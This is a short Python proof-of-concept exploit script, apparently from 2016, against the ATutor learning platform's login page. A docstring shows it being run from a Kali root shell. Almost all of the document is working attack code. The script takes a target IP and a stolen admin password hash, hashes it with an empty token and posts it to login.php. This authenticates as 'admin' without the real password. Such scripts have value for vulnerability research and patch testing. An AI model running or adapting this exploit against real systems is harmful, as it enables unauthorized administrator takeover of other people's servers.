#!/usr/bin/python """ root@kali:~# ./src-2016-0000.py (+) usage: ./src-2016-0000.py (+) eg: ./src-2016-0000.py 172.16.175.221 56b11a0603c7b7b8b4f06918e1bb5378ccd481cc root@kali:~# ./src-2016-0000.py target 56b11a0603c7b7b8b4f06918e1bb5378ccd481cc (+) success! """ import sys import hashlib import requests def gen_hash(passwd, token): m = hashlib.sha1() m.update(passwd + token) return m.hexdigest() def we_can_login_with_a_hash(): target = "http://%s/ATutor/login.php" % sys.argv[1] token = "" hashed = gen_hash(sys.argv[2], token) d = { "form_password_hidden" : hashed, "form_login": "admin", "submit": "Login", "token" : token } s = requests.Session() r = s.post(target, data=d) if "My Courses: My Start Page" in r.text: return True return False def main(): if len(sys.argv) != 3: print "(+) usage: %s " % sys.argv[0] print "(+) eg: %s 172.16.175.205 56b11a0603c7b7b8b4f06918e1bb5378ccd481cc" % sys.argv[0] sys.exit(-1) if we_can_login_with_a_hash(): print "(+) success!" if __name__ == "__main__": main()